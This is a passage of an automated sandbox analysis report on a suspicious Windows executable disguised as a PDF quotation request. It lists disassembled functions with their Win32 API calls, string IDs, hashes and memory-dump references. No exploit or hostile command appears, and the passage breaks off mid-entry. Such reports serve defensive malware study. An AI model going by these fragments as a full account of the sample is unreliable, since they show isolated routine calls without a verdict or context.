                                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                    Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                    Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                    • String ID: crts
                                                                    • API String ID: 943502515-3724388283
                                                                    • Opcode ID: 498c0d6e7309f6f0c265017fcc9d8cea2eeade816043c4fb7f6070666b64c2a7
                                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                    • Opcode Fuzzy Hash: 498c0d6e7309f6f0c265017fcc9d8cea2eeade816043c4fb7f6070666b64c2a7
                                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                    Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$LabelVolume
                                                                    • String ID: \VH
                                                                    • API String ID: 2006950084-234962358
                                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                    Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                    • DrawMenuBar.USER32 ref: 00449761
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                    • String ID: 0
                                                                    • API String ID: 772068139-4108050209
                                                                    • Opcode ID: d71aae844a00a6bc18d0c30cfc9cbf4787bee99b623b93684d7d7440456c6ae2
                                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                    • Opcode Fuzzy Hash: d71aae844a00a6bc18d0c30cfc9cbf4787bee99b623b93684d7d7440456c6ae2
                                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                    Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcscpy
                                                                    • String ID: 3, 3, 8, 1
                                                                    • API String ID: 3469035223-357260408
                                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                    Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                    • API String ID: 2574300362-3530519716
                                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                    Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                    • API String ID: 2574300362-275556492
                                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                    Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                    • API String ID: 2574300362-58917771
                                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                    Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                    Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                    Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                    • __itow.LIBCMT ref: 004699CD
                                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                    • __itow.LIBCMT ref: 00469A97
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                    Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                    Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                    Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                    Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
